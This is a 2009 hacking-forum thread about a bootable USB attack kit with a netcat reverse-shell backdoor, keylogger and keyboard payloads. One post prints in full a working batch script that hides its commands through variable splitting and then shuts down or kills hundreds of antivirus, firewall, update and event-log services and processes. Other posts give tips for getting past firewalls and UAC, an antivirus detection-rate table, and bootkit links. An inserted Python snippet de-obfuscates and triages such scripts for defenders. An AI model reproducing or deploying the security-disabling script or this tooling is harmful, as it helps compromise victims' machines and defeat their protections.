sablefoxx (Author), posted March 11, 2009

> Cmdo - Installs a netcat backdoor to port 69 (Reverse Shell), use NConnect to connect to victim (fixed the bsod bug) --> is it really that simple?? You just install that and then you are able to connect to your victim computer from, let's say, your home?? What about protection from the firewall of your router?? Just fire up Netcat and you're off to go?

Well, you won't be able to connect through (NAT) firewalls unless you edit the script to include the IP you plan to connect from. Otherwise, in XP it will automatically add itself to the Windows Firewall exception list, or in Vista if UAC is disabled. However, if UAC is enabled, or the victim has a 3rd party firewall installed, it will ask to add itself. Best used over LANs; however, with a little editing you can easily connect over the internet, through any firewall as well. Otherwise it is that simple.
Jen, posted March 12, 2009

Is it possible for you to help us edit it so that we can easily connect over the internet?
DingleBerries, posted March 12, 2009

I am working on a netcat clone atm, so maybe when it's finished sablefoxx can include that. It doesn't have all the tools, but most can be included. Atm all it does is bind a cmd shell to a port.
messsy, posted March 13, 2009

Nice post, will be trying this later on :) Hopefully it all goes to plan, but 9/10 something happens lol. Thanks for this, I'll be setting it up in VMware and testing it on a laptop (XP).
messsy, posted March 13, 2009

Ok, well, so far so good. leapo's payload seems to be working, well, working-ish, but I can figure that out through testing. I'll just ask one thing at a time as I seem to confuse people when I rabbit on lolz. I have extracted to USB and set the settings from menu.bat. I have copied the keyl_PE.exe to the pen drive and when clicked it says it's installed fine, but no C:\windows\keyl.txt. Hmmm, any help guys?
macsdd, posted March 15, 2009

Question: I have installed APE on a USB and patched the ISO, but it won't boot. My question is, what have I done wrong?
sablefoxx (Author), posted March 15, 2009

> Ok, well, so far so good. leapo's payload seems to be working, well, working-ish, but I can figure that out through testing. I'll just ask one thing at a time as I seem to confuse people when I rabbit on lolz. I have extracted to USB and set the settings from menu.bat. I have copied the keyl_PE.exe to the pen drive and when clicked it says it's installed fine, but no C:\windows\keyl.txt. Hmmm, any help guys?

Those payloads need to be installed from PE: boot from the USB drive and then run Keylpe.exe. I have also posted versions that can be installed from userspace.

> Question: I have installed APE on a USB and patched the ISO, but it won't boot. My question is, what have I done wrong?

Not all systems boot from USB; try another computer. Let me know if no system will boot from it. Also, typing this on a G1; I am out of town so won't be able to post updates for a while.
macsdd, posted March 15, 2009

I am able to boot from USB using this computer, as I have done so before (BackTrack 4). However, my question is where is the boot record on the USB? Currently all I see is the .iso file, which usually needs to be unpacked before it can be booted, but APE might work differently.
timmy, posted March 17, 2009

Good work here, enjoy the new version, but there is one thing: whenever I try to run leapo's payload on Vista it says that it can't find the go.vbs. So then I tried logging onto my computer and I go to system and I can clearly see go.vbs, and when I click it, it says that Vista can't find go.vbs even though it's right in front of its face!!! Any help would be gladly appreciated. There also seems to be a number of bugs for leapo's payload; I can't get it to work no matter what. I've tested it on Vista 32-bit, Vista 64-bit, and XP 64-bit. Has anyone else gotten this to work?
timmy, posted March 29, 2009

Are we still alive?
sablefoxx (Author), posted March 29, 2009

Yeah, working on updates, but been really busy with school (I also just got a Fon in the mail, so been playing around with that too). Hope to have new content and bug fixes up soon :) As far as your problems with finding/running the go.vbs, it may have been blocked by Anti-Virus, or possible problems with UAC. Remember Leapo's payload is writable, so AV can still remove files from it; however, with the new updates, running the payload before logging in should be easier (that way no AV and no UAC).
0x3, posted April 1, 2009

Could we make APE work under IIS6/server? I mean, if we could wget it from a URL and install it in the victim box? Just a question xd
timmy, posted April 14, 2009

I have coded a bat file to kill most popular anti viruses; it kills firewall and updates and other goodies. It's undetectable but totally not stealth and is still in beta. I think that it would be a perfect addition to Ape. Comments, problems, and I hope it will get patched into Ape. I call it AVKILLA.

@echo off
cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003
del /F /Q run.bat
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set o6t=nor
set lyd2=fee
set h3d=ton
set gf45=ntec
set own5=McA
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "Automatic Updates" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% "SAVScan" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
cls
%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% vrmonsvc /y
%ii%%ury% %ywe%%iej% MonSvcNT /y
%ii%%ury% %ywe%%iej% SAVScan /y
%ii%%ury% %ywe%%iej% NProtectService /y
%ii%%ury% %ywe%%iej% ccSetMGR /y
%ii%%ury% %ywe%%iej% ccEvtMGR /y
%ii%%ury% %ywe%%iej% srservice /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
%ii%%ury% %ywe%%iej% MskService /y
%ii%%ury% %ywe%%iej% MpfService /y
%ii%%ury% %ywe%%iej% mcupdmgr.exe /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
%ii%%ury% %ywe%%iej% helpsvc /y
%ii%%ury% %ywe%%iej% ERSvc /y
%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
cls
%ii%%ury% %ywe%%iej% ccPwdSvc /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Serv-U" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
%ii%%ury% %ywe%%iej% "NAV Alert" /y
%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
cls
%ii%%ury% %ywe%%iej% "McShield" /y
%ii%%ury% %ywe%%iej% "DefWatch" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% InoRPC /y
%ii%%ury% %ywe%%iej% InoRT /y
%ii%%ury% %ywe%%iej% InoTask /y
cls
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
%ii%%ury% %ywe%%iej% "SyGateService" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
cls
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
cls
net stop netsvcs
net stop spoolnt
pskill spoolsvc.exe
pskill spoolsv.exe
pskill netsvcs.exe
pskill srvany.exe
pskill spool.exe
pskill secure32.exe
pskill ahnsd.exe
pskill mspmspsv.exe
pskill stisvc.exe
pskill servudaemon.exe
pskill snservice.exe
pskill noadmon.exe
pskill ahnsdsv.exe
pskill sdac11ba.exe
pskill system.exe
pskill navapsvc.exe
pskill winload.exe
pskill v3p3at.exe
pskill monsvcnt.exe
pskill winhelp32.exe
pskill sagent2.exe
pskill win32.exe
pskill monsysnt.exe
pskill cisvsc.exe
pskill alg.exe
pskill mdm.exe
pskill mcshield.exe
pskill nvsvc32.exe
pskill rundll32.exe
pskill msdevice.exe
pskill srvmon.exe
pskill rundll32.exe
pskill userbatch.exe
pskill navapw32.exe
pskill keyservice.exe
pskill netpiadw.exe
pskill dwagent.exe
pskill internat.exe
pskill dllsvc.exe
pskill mvcc.exe
pskill tachy.exe
pskill lsass12.exe
pskill tskmngr.exe
pskill bomsvc32.exe
pskill vstmgr.exe
pskill firedaemon.exe
pskill lvcoms.exe
pskill msnupdate.exe
pskill conime.exe
pskill gmt.exe
pskill mtbp.exe
pskill squerycontrol32.exe
pskill precisiontime.exe
pskill winhost.exe
pskill net.exe
pskill serviceguard.exe
pskill swoff.exe
pskill mstunnel.exe
pskill msfig.exe
pskill fxsvc.exe
pskill clisvc.exe
pskill mspmspsv.exe
pskill ccap.exe
pskill mcshield.exe
pskill vrmonsvc.exe
pskill vrmonNT.exe
pskill v3impro.exe
pskill ncvscc32.exe
pskill host.exe
pskill videosd32.exe
pskill msgfixer.exe
pskill adspider.exe
pskill regsvc.exe
pskill naviagent.exe
pskill winserv32.exe
pskill dllhost.exe
pskill hkcmd.exe
pskill sqlmngr.exe
pskill llssrv.exe
pskill svchost2.exe
pskill ipbind.exe
pskill ftp.exe
pskill svchost1.exe
pskill winsys9242.exe
pskill turboagent.exe
pskill hkstart.exe
pskill winmgmt.exe
pskill mouse32a.exe
pskill net1.exe
pskill winmysqladmin.exe
pskill sctsvc.exe
pskill winmgnt.exe
pskill iroffer.exe
pskill awhost32.exe
pskill wuauclt.exe
pskill a2guard
pskill aavshield
pskill AckWin32
pskill ADVCHK
pskill AhnSD
pskill airdefense
pskill ALERTSVC
pskill ALMon
pskill ALOGSERV
pskill ALsvc
pskill amon
pskill Anti-Trojan
pskill AntiVirScheduler
pskill AntiVirService
pskill ANTS
pskill APVXDWIN
pskill Armor2net
pskill ashAvast
pskill ashDisp
pskill ashEnhcd
pskill ashMaiSv
pskill ashPopWz
pskill ashServ
pskill ashSimpl
pskill ashSkPck
pskill ashWebSv
pskill aswUpdSv
pskill ATCON
pskill ATUPDATER
pskill ATWATCH
pskill AUPDATE
pskill AUTODOWN
pskill AUTOTRACE
pskill AUTOUPDATE
pskill avciman
pskill Avconsol
pskill AVENGINE
pskill avgamsvr
pskill avgcc
pskill AVGCC32
pskill AVGCTRL
pskill avgemc
pskill avgfwsrv
pskill AVGNT
pskill avgntdd
pskill avgntmgr
pskill AVGSERV
pskill AVGUARD
pskill avgupsvc
pskill avinitnt
pskill AvkServ
pskill AVKService
pskill AVKWCtl
pskill AVP
pskill AVP32
pskill avpcc
pskill avpm
pskill AVPUPD
pskill AVSCHED32
pskill avsynmgr
pskill AVWUPD32
pskill AVWUPSRV
pskill AVXMONITOR9X
pskill AVXMONITORNT
pskill AVXQUAR
pskill BackWeb-4476822
pskill bdmcon
pskill bdnews
pskill bdoesrv
pskill bdss
pskill bdsubmit
pskill bdswitch
pskill blackd
pskill blackice
pskill cafix
pskill ccApp
pskill ccEvtMgr
pskill ccProxy
pskill ccSetMgr
pskill CFIAUDIT
pskill ClamTray
pskill ClamWin
pskill Claw95
pskill Claw95cf
pskill cleaner
pskill cleaner3
pskill CliSvc
pskill CMGrdian
pskill cpd
pskill DefWatch
pskill DOORS
pskill DrVirus
pskill drwadins
pskill drweb32w
pskill drwebscd
pskill DRWEBUPW
pskill ESCANH95
pskill ESCANHNT
pskill ewidoctrl
pskill EzAntivirusRegistrationCheck
pskill F-AGNT95
pskill F-PROT95
pskill F-Sched
pskill F-StopW
pskill FAMEH32
pskill FAST
pskill FCH32
pskill FireSvc
pskill FireTray
pskill FIREWALL
pskill fpavupdm
pskill freshclam
pskill FRW
pskill fsav32
pskill fsavgui
pskill fsbwsys
pskill fsdfwd
pskill FSGK32
pskill fsgk32st
pskill fsgui
pskill FSM32
pskill FSMA32
pskill FSMB32
pskill fspex
pskill fssm32
pskill gcasDtServ
pskill gcasServ
pskill GIANTAntiSpywareMain
pskill GIANTAntiSpywareUpdater
pskill GUARD
pskill GUARDGUI
pskill GuardNT
pskill HRegMon
pskill Hrres
pskill HSockPE
pskill HUpdate
pskill iamapp
pskill iamserv
pskill ICLOAD95
pskill ICLOADNT
pskill ICMON
pskill ICSSUPPNT
pskill ICSUPP95
pskill ICSUPPNT
pskill IFACE
pskill INETUPD
pskill InocIT
pskill InoRpc
pskill InoRT
pskill InoTask
pskill InoUpTNG
pskill IOMON98
pskill isafe
pskill ISATRAY
pskill ISRV95
pskill ISSVC
pskill JEDI
pskill KAV
pskill kavmm
pskill KAVPF
pskill KavPFW
pskill KAVStart
pskill KAVSvc
pskill KAVSvcUI
pskill KMailMon
pskill KPfwSvc
pskill KWatch
pskill livesrv
pskill LOCKDOWN2000
pskill LogWatNT
pskill lpfw
pskill LUALL
pskill LUCOMSERVER
pskill Luupdate
pskill MCAGENT
pskill mcmnhdlr
pskill mcregwiz
pskill Mcshield
pskill MCUPDATE
pskill mcvsshld
pskill MINILOG
pskill MONITOR
pskill MonSysNT
pskill MOOLIVE
pskill MpEng
pskill mpssvc
pskill MSMPSVC
pskill myAgtSvc
pskill myagttry
pskill navapsvc
pskill NAVAPW32
pskill NavLu32
pskill NAVW32
pskill NDD32
pskill NeoWatchLog
pskill NeoWatchTray
pskill NISSERV
pskill NISUM
pskill NMAIN
pskill nod32
pskill nod32krn
pskill nod32kui
pskill NORMIST
pskill notstart
pskill npavtray
pskill NPFMNTOR
pskill npfmsg
pskill NPROTECT
pskill NSCHED32
pskill NSMdtr
pskill NssServ
pskill NssTray
pskill ntrtscan
pskill NTXconfig
pskill NUPGRADE
pskill NVC95
pskill Nvcod
pskill Nvcte
pskill Nvcut
pskill NWService
pskill OfcPfwSvc
pskill OUTPOST
pskill PAV
pskill PavFires
pskill PavFnSvr
pskill Pavkre
pskill PavProt
pskill pavProxy
pskill pavprsrv
pskill pavsrv51
pskill PAVSS
pskill pccguide
pskill PCCIOMON
pskill pccntmon
pskill PCCPFW
pskill PcCtlCom
pskill PCTAV
pskill PERSFW
pskill pertsk
pskill PERVAC
pskill PNMSRV
pskill POP3TRAP
pskill POPROXY
pskill prevsrv
pskill PsImSvc
pskill QHM32
pskill QHONLINE
pskill QHONSVC
pskill QHPF
pskill qhwscsvc
pskill RavMon
pskill RavTimer
pskill Realmon
pskill REALMON95
pskill Rescue
pskill rfwmain
pskill Rtvscan
pskill RTVSCN95
pskill RuLaunch
pskill SAVAdminService
pskill SAVMain
pskill savprogress
pskill SAVScan
pskill SCAN32
pskill ScanningProcess
pskill sched
pskill sdhelp
pskill SERVIC~1
pskill SHSTAT
pskill SiteCli
pskill smc
pskill SNDSrvc
pskill SPBBCSvc
pskill SPHINX
pskill spiderml
pskill spidernt
pskill Spiderui
pskill SpybotSD
pskill SPYXX
pskill SS3EDIT
pskill stopsignav
pskill swAgent
pskill swdoctor
pskill SWNETSUP
pskill symlcsvc
pskill SymProxySvc
pskill SymSPort
pskill SymWSC
pskill SYNMGR
pskill TAUMON
pskill TBMon
pskill TC
pskill tca
pskill TCM
pskill TDS-3
pskill TeaTimer
pskill TFAK
pskill THAV
pskill THSM
pskill Tmas
pskill tmlisten
pskill Tmntsrv
pskill TmPfw
pskill tmproxy
pskill TNBUtil
pskill TRJSCAN
pskill Up2Date
pskill UPDATE
pskill UpdaterUI
pskill upgrepl
pskill Vba32ECM
pskill Vba32ifs
pskill vba32ldr
pskill Vba32PP3
pskill VBSNTW
pskill vchk
pskill vcrmon
pskill VetTray
pskill VirusKeeper
pskill VPTRAY
pskill vrfwsvc
pskill VRMONNT
pskill vrmonsvc
pskill vrrw32
pskill VSECOMR
pskill Vshwin32
pskill vsmon
pskill vsserv
pskill VsStat
pskill WATCHDOG
pskill WebProxy
pskill Webscanx
pskill WEBTRAP
pskill WGFE95
pskill Winaw32
pskill winroute
pskill winss
pskill winssnotify
pskill WRADMIN
pskill WRCTRL
pskill xcommsvr
pskill zatutor
pskill ZAUINST
pskill zlclient
pskill zonealarm
pskill _AVP32
pskill _AVPCC
pskill _AVPM
pskill scanwscs
pskill scanmsg
pskill onlnsvc
pskill upschd
pskill antivirus
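From the defender's side, the part of the script above worth understanding is not the long kill list but the variable-splitting at the top (`set ii=ne`, `set ury=t`, `set ywe=st`, `set iej=op`): the command `net stop` never appears in the file as a literal, so a naive string search for "net stop" on the file misses it. The Python below is an added example written for this thread, not code from timmy's post or from APE. It resolves that obfuscation the way cmd.exe would (substituting `%var%` against the `set` assignments seen so far) and then triages which services and processes the resolved script stops or kills against a watchlist. The batch excerpt `SAMPLE_BAT` and the watchlist `SECURITY_NAMES` are constructed for illustration; the watchlist would come from your own inventory.

```python
import re

# Constructed excerpt in the style of the AVKILLA batch file posted above:
# command words are split into variable fragments ("ne"+"t", "st"+"op") so
# the literal string "net stop" never appears in the file on disk.
SAMPLE_BAT = r"""@echo off
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set gf45=ntec
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% Spooler /y
pskill mcshield.exe
echo done
"""

# Constructed watchlist (lower-case) of services and processes whose forced
# stop is a strong security-tampering signal; extend from your own inventory.
SECURITY_NAMES = {
    "security center", "automatic updates", "eventlog",
    "symantec core lc", "mcshield.exe",
}

SET_RE = re.compile(r"^\s*set\s+([^=\s]+)=(.*)$", re.IGNORECASE)
VAR_RE = re.compile(r"%([^%\s]+)%")
STOP_RE = re.compile(r'^\s*net\s+stop\s+"?([^"/]+?)"?\s*(?:/y)?\s*$', re.IGNORECASE)
KILL_RE = re.compile(r"^\s*pskill\s+(\S+)", re.IGNORECASE)


def expand_batch(text):
    """Resolve %var% references against the 'set' assignments seen so far.

    Returns the non-'set' lines with variables substituted. Substitution is
    repeated (bounded) so fragments that themselves contain fragments resolve.
    Unknown variables are left untouched, as cmd.exe does for unset names.
    """
    env = {}
    expanded = []
    for raw in text.splitlines():
        m = SET_RE.match(raw)
        if m:
            env[m.group(1).lower()] = m.group(2)
            continue
        line = raw
        for _ in range(8):
            new = VAR_RE.sub(lambda v: env.get(v.group(1).lower(), v.group(0)), line)
            if new == line:
                break
            line = new
        expanded.append(line)
    return expanded


def triage(text):
    """Return (command, target, on_watchlist) for every stop/kill in the script."""
    findings = []
    for line in expand_batch(text):
        m = STOP_RE.match(line)
        if m:
            target = m.group(1).strip()
            findings.append(("net stop", target, target.lower() in SECURITY_NAMES))
            continue
        m = KILL_RE.match(line)
        if m:
            target = m.group(1)
            findings.append(("pskill", target, target.lower() in SECURITY_NAMES))
    return findings


def summarize(text):
    """Counts an analyst can threshold on: total stops/kills and watchlist hits."""
    findings = triage(text)
    return {
        "stops": sum(1 for cmd, _, _ in findings if cmd == "net stop"),
        "kills": sum(1 for cmd, _, _ in findings if cmd == "pskill"),
        "security_hits": sum(1 for _, _, hit in findings if hit),
    }


if __name__ == "__main__":
    for cmd, target, hit in triage(SAMPLE_BAT):
        print(f"{'!! ' if hit else '   '}{cmd} {target}")
    print(summarize(SAMPLE_BAT))
```

Run it against a real sample by reading the file into `triage()` instead of `SAMPLE_BAT`. A script that stops "Security Center", "Automatic Updates" and "eventlog" in one go, as the posted one does, scores high on `security_hits` regardless of how the command words were assembled, which is the property a triage rule should key on rather than on any literal string.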
DingleBerries, posted April 14, 2009

> I have coded a bat file to kill most popular anti viruses; it kills firewall and updates and other goodies. It's undetectable but totally not stealth and is still in beta. I think that it would be a perfect addition to Ape. Comments, problems, and I hope it will get patched into Ape. I call it AVKILLA.

Unless your name is Codine and you are from the hakforums and you wrote that in 2007, then you didn't code that. PROOF: forum topic posted by wohawsnng, 01-14-08. Please give credit where credit is due.
sablefoxx (Author), posted April 15, 2009

> I have coded a bat file to kill most popular anti viruses; it kills firewall and updates and other goodies. It's undetectable but totally not stealth and is still in beta. I think that it would be a perfect addition to Ape. Comments, problems, and I hope it will get patched into Ape. I call it AVKILLA.
> [timmy's AVKILLA batch file quoted in full; it is the same script as in timmy's post above]

timmy, timmy, timmy... we are well versed in the art of teh internets here

*** hope to have a new version up soon (lots of cool new stuff)... fucking school :( ***
pritchard9, posted April 15, 2009

Awesome project man. Definitely gonna keep track of this.

> I should have just released it as is.

Never too late, Darren... ;)
sablefoxx (Author), posted April 21, 2009

Wonder if I could get a few people to test the new payload install method; made a nice little GUI. This is just a few keyboard payloads I made while playing around with AHK (lots of fun btw!). Patch it into your AttackPE.iso file and select "PE" under mode to install payloads from PE; otherwise select "Normal" mode. Note: You may need to runas an admin in Vista if UAC is enabled (and not in PE)!

Features:
1. All keyboard payloads included in one small .exe
2. Built-in removal tools
3. GUI (simple)
4. Install payloads from Normal mode or P.E.
5. Auto-detects if you're in Normal or P.E. (v1.2+)
6. You do NOT need AttackPE to use these payloads!

Planning on converting all the payloads to something like this, so let me know what you think!

Download: Compiled && Source (v1.2)

Detection Rate:

Antivirus           Version          Last Update   Result
a-squared           4.0.0.101        2009.04.21    -
AhnLab-V3           5.0.0.2          2009.04.21    -
AntiVir             7.9.0.148        2009.04.20    -
Antiy-AVL           2.0.3.1          2009.04.20    -
Authentium          5.1.2.4          2009.04.20    -
Avast               4.8.1335.0       2009.04.20    -
AVG                 8.5.0.287        2009.04.20    -
BitDefender         7.2              2009.04.21    -
CAT-QuickHeal       10.00            2009.04.21    -
ClamAV              0.94.1           2009.04.21    -
Comodo              1123             2009.04.20    -
DrWeb               4.44.0.09170     2009.04.21    -
eSafe               7.0.17.0         2009.04.20    Suspicious File
eTrust-Vet          31.6.6440        2009.04.20    -
F-Prot              4.4.4.56         2009.04.20    -
F-Secure            8.0.14470.0      2009.04.21    -
Fortinet            3.117.0.0        2009.04.21    -
GData               19               2009.04.21    -
Ikarus              T3.1.1.49.0      2009.04.21    -
K7AntiVirus         7.10.709         2009.04.20    -
Kaspersky           7.0.0.125        2009.04.21    -
McAfee              5590             2009.04.20    -
McAfee+Artemis      5590             2009.04.20    -
McAfee-GW-Edition   6.7.6            2009.04.21    -
Microsoft           1.4602           2009.04.21    -
NOD32               4023             2009.04.20    -
Norman              6.00.06          2009.04.20    -
nProtect            2009.1.8.0       2009.04.20    -
Panda               10.0.0.14        2009.04.20    -
PCTools             4.4.2.0          2009.04.21    -
Prevx1              V2               2009.04.21    -
Rising              21.26.10.00      2009.04.21    -
Sophos              4.40.0           2009.04.21    -
Sunbelt             3.2.1858.2       2009.04.18    -
Symantec            1.4.4.12         2009.04.21    -
TheHacker           6.3.4.0.312      2009.04.21    -
TrendMicro          8.700.0.1004     2009.04.21    -
VBA32               3.12.10.2        2009.04.21    -
ViRobot             2009.4.21.1701   2009.04.21    -
VirusBuster         4.6.5.0          2009.04.20    -

Total: 2.5% (Suspicious File only)
D3XTA, posted April 23, 2009

Hi, been reading these forums for a while now, so decided to join so I can contribute and learn a bit more :). Anyway... sable, I tried your payloads UI and they work perfect, but I cannot seem to disable the payload once it's activated. It says it's removed, but I still get binary lol :). Any ideas?

EDIT: Also forgot to say Sophos does not detect a thing. Bonus.
DingleBerries, posted April 23, 2009

SableFoxx, why not add something like the VBootkit? It takes control of the Windows boot process to allow privilege escalation. Here is the source: http://www.nvlabs.in/archives/5-BOOT-KIT-C...Subversion.html And the white paper: http://www.nvlabs.in/uploads/projects/vboo..._whitepaper.pdf Here is a compiled version, not yet tested: http://www.mediafire.com/download.php?2zrkzmuakyn
sablefoxx (Author), posted April 24, 2009

> Hi, been reading these forums for a while now, so decided to join so I can contribute and learn a bit more :). Anyway... sable, I tried your payloads UI and they work perfect, but I cannot seem to disable the payload once it's activated. It says it's removed, but I still get binary lol :). Any ideas?
> EDIT: Also forgot to say Sophos does not detect a thing. Bonus.

My bad. Press the Windows Key + X (keyr.exe does NOT remap the 'x' key by default) to stop all the keyboard payloads; this only temporarily stops the payload that is running, then run removal. Also, if you're running Vista you may need to run the keybrd_pl.exe 'as admin'. Thx for the input, I'll make a fix for this. There are also some bugs in keyr.exe; I'll be posting updates soon.

@DingleBerries, interesting... very interesting...

4/25/09 Edit: Released updated v1.2; fixes bugs with Keyr and removal not working correctly after the payload was activated.
pritchard9, posted April 27, 2009

Is there an antidote? I'd love to test this on my current PC, but lack the hardware spec to run a VM.
sablefoxx (Author), posted April 27, 2009

Almost everything has a removal tool (only the cmdo payload does not); the updated version I'm working on now will fix that. But certainly any time you boot into a PE, a couple of wrong clicks or commands can break the local OS, so be careful *shakes finger*. The new keyboard payloads have a built-in removal tool; as of 1.2 it actually works :)
pritchard9, posted April 27, 2009

> Almost everything has a removal tool (only the cmdo payload does not); the updated version I'm working on now will fix that. But certainly any time you boot into a PE, a couple of wrong clicks or commands can break the local OS. The new keyboard payloads have a built-in removal tool.

Thanks for such a speedy reply. Great project. :)
pritchard9, posted April 29, 2009

Sorry for the double post. I tried to install this, but couldn't boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB: even after disabling the HD in the BIOS, it fails to detect the OS on the USB and magically boots to Vista :(. I even booted into Puppy Linux to make the USB partition bootable; still nothing. Any help would be great. Thanks.
sablefoxx (Author), posted April 29, 2009

> Sorry for the double post. I tried to install this, but couldn't boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB: even after disabling the HD in the BIOS, it fails to detect the OS on the USB and magically boots to Vista :(. I even booted into Puppy Linux to make the USB partition bootable; still nothing. Any help would be great. Thanks.

In my experience, sometimes APE just won't boot on some systems, and I'm not sure how to fix that. However, here are a few tricks you can try:
1. Use a different USB drive; sometimes it's the drive itself, not the computer.
2. Disable USB Legacy support in the BIOS (not every BIOS has this).

If anyone else has found some cool tricks, please post them.